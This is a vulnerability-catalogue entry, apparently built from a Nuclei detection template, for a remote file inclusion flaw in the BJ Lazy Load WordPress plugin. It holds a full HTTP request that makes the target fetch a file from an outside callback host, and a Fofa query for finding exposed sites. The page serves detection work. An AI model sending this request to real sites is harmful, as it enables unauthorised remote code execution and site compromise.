🔙 목록으로 돌아가기

CVE-2015-9415: BJ Lazy Load (Timthumb) <= 0.7.5 - Remote File Inclusion

TitleBJ Lazy Load (Timthumb) <= 0.7.5 - Remote File Inclusion
Authors4e-io
SeverityHigh
ImpactAttackers can include and execute remote malicious files, potentially leading to remote code execution and complete site compromise.
RemediationFixed in 1.0
CVSS Score7.5
EPSS Score0.15525
CVE IDCVE-2015-9415
CWE IDCWE-20
Fofa Querybody="/wp-content/plugins/bj-lazy-load"
Tags cve cve2015 wp wp-plugin wordpress wpscan bj-lazy-load rfi vkev vuln

🔍 Vulnerability Description

The BJ Lazy Load plugin v0.7.5 for WordPress has a Remote File Inclusion vulnerability via TimThumb.

🌐 HTTP Request

GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://d5jqpj1le0o2i018ombgz1purznqw86p7.oast.online/9aoPqClOfsKxVwCw.jpg HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-9415.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-9415.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A